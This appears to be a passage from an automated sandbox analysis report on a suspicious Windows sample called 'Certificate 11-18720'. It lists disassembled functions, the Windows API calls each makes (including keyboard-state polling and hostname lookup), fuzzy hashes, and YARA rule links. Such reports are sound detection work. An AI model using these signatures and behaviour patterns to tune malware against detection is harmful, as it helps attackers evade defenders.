                                                                                    • Opcode Fuzzy Hash: fd44fd37dd8604800ead5c0440e2b0900453406d404fffab4c70d6927d50ce11
                                                                                    • Instruction Fuzzy Hash: 48214F74A44245BFE7195B60EC99B673F6BFB45788F006128F506823A2CFB1AD05DB24
                                                                                    Function 006102EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CoInitialize.OLE32(00000000), ref: 0061034B
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006103DE
                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 006103F2
                                                                                    • CoCreateInstance.OLE32(0064DA8C,00000000,00000001,00673CF8,?), ref: 0061043E
                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006104AD
                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00610505
                                                                                    • _memset.LIBCMT ref: 00610542
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0061057E
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006105A1
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 006105A8
                                                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006105DF
                                                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 006105E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1246142700-0
                                                                                    • Opcode ID: 77ea64b7b5413fcd6a5709b021e51a8e7afd3226134ce236c30d4e1aa3cf75cc
                                                                                    • Instruction ID: 0b7424dec1ff509bfb73320e8f4dbc47add676ed3b0ad6710988774b114eed7a
                                                                                    • Opcode Fuzzy Hash: 77ea64b7b5413fcd6a5709b021e51a8e7afd3226134ce236c30d4e1aa3cf75cc
                                                                                    • Instruction Fuzzy Hash: 07B1DB75A00109AFDB14DFA4C988DAEBBBAFF88314B148499F905EB251DB70ED81CF50
                                                                                    Function 00602E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00602ED6
                                                                                    • SetKeyboardState.USER32(?), ref: 00602F41
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00602F61
                                                                                    • GetKeyState.USER32(000000A0), ref: 00602F78
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00602FA7
                                                                                    • GetKeyState.USER32(000000A1), ref: 00602FB8
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00602FE4
                                                                                    • GetKeyState.USER32(00000011), ref: 00602FF2
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 0060301B
                                                                                    • GetKeyState.USER32(00000012), ref: 00603029
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00603052
                                                                                    • GetKeyState.USER32(0000005B), ref: 00603060
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: c5f1f29e6c476fcef25188d24cde4b4f04b8274b48de2591eeda5852f332fd44
                                                                                    • Instruction ID: 62046d25556adb5a26571b30b970b4a8213976a54f8417edead109106e6f46fb
                                                                                    • Opcode Fuzzy Hash: c5f1f29e6c476fcef25188d24cde4b4f04b8274b48de2591eeda5852f332fd44
                                                                                    • Instruction Fuzzy Hash: 8B51E970A8479529FB3DDB6488247EBBFB65F11380F08459DC5C25A3C2DA949B4CC761
                                                                                    Function 005FED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 005FED1E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 005FED30
                                                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 005FED8E
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 005FED99
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 005FEDAB
                                                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 005FEE01
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 005FEE0F
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 005FEE20
                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 005FEE63
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 005FEE71
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 005FEE8E
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 005FEE9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: 47b82b6fea14dd57e4de4f0e3d8725a66f000bcb45535f30892cad7337ceff95
                                                                                    • Instruction ID: 69121a6103f9e37e6083ceef28b0356827e3429b357f13e87563d44222cf0c29
                                                                                    • Opcode Fuzzy Hash: 47b82b6fea14dd57e4de4f0e3d8725a66f000bcb45535f30892cad7337ceff95
                                                                                    • Instruction Fuzzy Hash: C0512175B00209AFDB18DF69DD86AAEBBBAFB89700F15812DF619D7290D7749D00CB10
                                                                                    Function 005DB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005DB759,?,00000000,?,?,?,?,005DB72B,00000000,?), ref: 005DBA58
                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,005DB72B), ref: 005DB7F6
                                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 005DB88D
                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0063D8A6
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 0063D8D7
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 0063D8EE
                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005DB72B,00000000,?,?,005DB2EF,?,?), ref: 0063D90A
                                                                                    • DeleteObject.GDI32(00000000), ref: 0063D91C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 641708696-0
                                                                                    • Opcode ID: e02a689841a28306290ee9355d3ad82159e5fd8849d1ffdd9d2df067e56b52e6
                                                                                    • Instruction ID: 49be207db1d95494021c2baa49da17d164444ab83245151651c082ffd33c6faf
                                                                                    • Opcode Fuzzy Hash: e02a689841a28306290ee9355d3ad82159e5fd8849d1ffdd9d2df067e56b52e6
                                                                                    • Instruction Fuzzy Hash: 78617E30901601DFEB359F18E988B65BBFBFF96715F16161FE0868A760D770A881DB80
                                                                                    Function 005DB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005DB526: GetWindowLongW.USER32(?,000000EB), ref: 005DB537
                                                                                    • GetSysColor.USER32(0000000F), ref: 005DB438
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: 793c72a5b7634bd8c7affc1d124991dbcfdbb7cbbdf2ca7c6209c08ccd37233c
                                                                                    • Instruction ID: 10879d40e371bde8462145ff6f74c851fc2d275ffaca49076f750a3cd1ed868d
                                                                                    • Opcode Fuzzy Hash: 793c72a5b7634bd8c7affc1d124991dbcfdbb7cbbdf2ca7c6209c08ccd37233c
                                                                                    • Instruction Fuzzy Hash: A4419E34400140EBEF359F2C9889BB93F67BB46720F594263FD658A2E6D7308C42D762
                                                                                    Function 0060690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                    • String ID:
                                                                                    • API String ID: 136442275-0
                                                                                    • Opcode ID: a1b1717e698e3cc1bd026901cb26fc6ee348223348bf97f71f64646f3928644e
                                                                                    • Instruction ID: f743e476f5810b10efd1875dd80e9689dc7c8026e412adbff0e700a126aabd26
                                                                                    • Opcode Fuzzy Hash: a1b1717e698e3cc1bd026901cb26fc6ee348223348bf97f71f64646f3928644e
                                                                                    • Instruction Fuzzy Hash: 0A41537688516DAECF65EB90CC45DCF77BDFB84300F1051E6B689A2081EA70ABE58F50
                                                                                    Function 0060D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(0065DC00,0065DC00,0065DC00), ref: 0060D7CE
                                                                                    • GetDriveTypeW.KERNEL32(?,00673A70,00000061), ref: 0060D898
                                                                                    • _wcscpy.LIBCMT ref: 0060D8C2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2820617543-1000479233
                                                                                    • Opcode ID: aa33687647e0b126a7a6644c2d60cca31d1773d9db62308b73ad7177ea3deb6f
                                                                                    • Instruction ID: 9a71eaaad27c2b812af8a2a7aec4617d45dbf8d8cadc7263ed02ac57a617cc6e
                                                                                    • Opcode Fuzzy Hash: aa33687647e0b126a7a6644c2d60cca31d1773d9db62308b73ad7177ea3deb6f
                                                                                    • Instruction Fuzzy Hash: F651A035144201AFC714EF54C886AAFBBA6FF84314F108A2EF59A573E2EB31DD05CA42
                                                                                    Function 005C936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 005C93AB
                                                                                    • __itow.LIBCMT ref: 005C93DF
                                                                                      • Part of subcall function 005E1557: _xtow@16.LIBCMT ref: 005E1578
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf_xtow@16
                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                    • API String ID: 1502193981-2263619337
                                                                                    • Opcode ID: 4fd85c6e30aa8a03678994fa9a9ae8afd997ff5a18556a8bcb89078c47cd51a4
                                                                                    • Instruction ID: 43b5b78227e5dcc4972c2d4c6efdd90ba39908b88e25a89cbb91655e75ea4ec2
                                                                                    • Opcode Fuzzy Hash: 4fd85c6e30aa8a03678994fa9a9ae8afd997ff5a18556a8bcb89078c47cd51a4
                                                                                    • Instruction Fuzzy Hash: 5F41B5715042059FDB24DBA4D945FAABBE9FB84700F20486FE14AD7281EA71A941CB50
                                                                                    Function 0062A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0062A259
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0062A260
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0062A273
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0062A27B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0062A286
                                                                                    • DeleteDC.GDI32(00000000), ref: 0062A28F
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0062A299
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0062A2AD
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0062A2B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: 3cd9c6a3ef83151ab2d16256b11349030e30b093b50d9eb7352fa9795c4d54db
                                                                                    • Instruction ID: 590a6ce9a2faaa3ac67dfdfba6f495ebde954d3c3e5827cdc9cfbec787eb4138
                                                                                    • Opcode Fuzzy Hash: 3cd9c6a3ef83151ab2d16256b11349030e30b093b50d9eb7352fa9795c4d54db
                                                                                    • Instruction Fuzzy Hash: 9731AD31501524FBDF219FA4EC09FEA3B6AFF0A360F150215FA19A61A0C772D811DBA5
                                                                                    Function 00606F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 2620052-3771769585
                                                                                    • Opcode ID: 2b210875a1abe770f1f7b9d7d74bacf0943d47a2859b4fea051f235b66f278d8
                                                                                    • Instruction ID: 34161861223b814443f3d8c0bd11c26a631b387b0be9b48b6a46b13083f0fe12
                                                                                    • Opcode Fuzzy Hash: 2b210875a1abe770f1f7b9d7d74bacf0943d47a2859b4fea051f235b66f278d8
                                                                                    • Instruction Fuzzy Hash: 7811E771904116AFCB28AB60EC4AEDA7BAEEF41710F011066F145961C1EFB09A958B50
                                                                                    Function 005E500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005E5047
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    • __gmtime64_s.LIBCMT ref: 005E50E0
                                                                                    • __gmtime64_s.LIBCMT ref: 005E5116
                                                                                    • __gmtime64_s.LIBCMT ref: 005E5133
                                                                                    • __allrem.LIBCMT ref: 005E5189
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005E51A5
                                                                                    • __allrem.LIBCMT ref: 005E51BC
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005E51DA
                                                                                    • __allrem.LIBCMT ref: 005E51F1
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005E520F
                                                                                    • __invoke_watson.LIBCMT ref: 005E5280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                    • String ID:
                                                                                    • API String ID: 384356119-0
                                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction ID: 0fe84af7382476d9841a90465c340bd9c13171f2c30d2509f1ed96c6b2e45ed6
                                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                    • Instruction Fuzzy Hash: 9F7118B6A00F57ABD718DE7ACC45B6A7BA8BF40368F144229F690D6281F774DD408BD0
                                                                                    Function 00604DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00604DF8
                                                                                    • GetMenuItemInfoW.USER32(00681708,000000FF,00000000,00000030), ref: 00604E59
                                                                                    • SetMenuItemInfoW.USER32(00681708,00000004,00000000,00000030), ref: 00604E8F
                                                                                    • Sleep.KERNEL32(000001F4), ref: 00604EA1
                                                                                    • GetMenuItemCount.USER32(?), ref: 00604EE5
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00604F01
                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00604F2B
                                                                                    • GetMenuItemID.USER32(?,?), ref: 00604F70
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00604FB6
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00604FCA
                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00604FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                    • String ID:
                                                                                    • API String ID: 4176008265-0
                                                                                    • Opcode ID: 780a29ab9f1c527db072841d950afec9a3698420b94e00c38c70837302aaf48a
                                                                                    • Instruction ID: 2503ae8c23eede0a029c29526004b107cacbb06abb32c75fb072109d7a444a7c
                                                                                    • Opcode Fuzzy Hash: 780a29ab9f1c527db072841d950afec9a3698420b94e00c38c70837302aaf48a
                                                                                    • Instruction Fuzzy Hash: 806192B594024AAFDB28CFA4DC84AEF7BBAFB81304F140159F641972D1DB71AD45CB20
                                                                                    Function 00629C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00629C98
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00629C9B
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00629CBF
                                                                                    • _memset.LIBCMT ref: 00629CD0
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00629CE2
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00629D5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 830647256-0
                                                                                    • Opcode ID: 995547fff0a8ed56b64f18c5afc72ffba87d027f3d66b2a55828bb90703f0998
                                                                                    • Instruction ID: 5d683f439fe4cc971d1c0d27147a45499dd39cac547f6c1d6513b0cfc575e1db
                                                                                    • Opcode Fuzzy Hash: 995547fff0a8ed56b64f18c5afc72ffba87d027f3d66b2a55828bb90703f0998
                                                                                    • Instruction Fuzzy Hash: 3E618C75A00618AFDB10DFA4DC81EEE77B9EF49704F100159FA44AB291D770AD42DF60
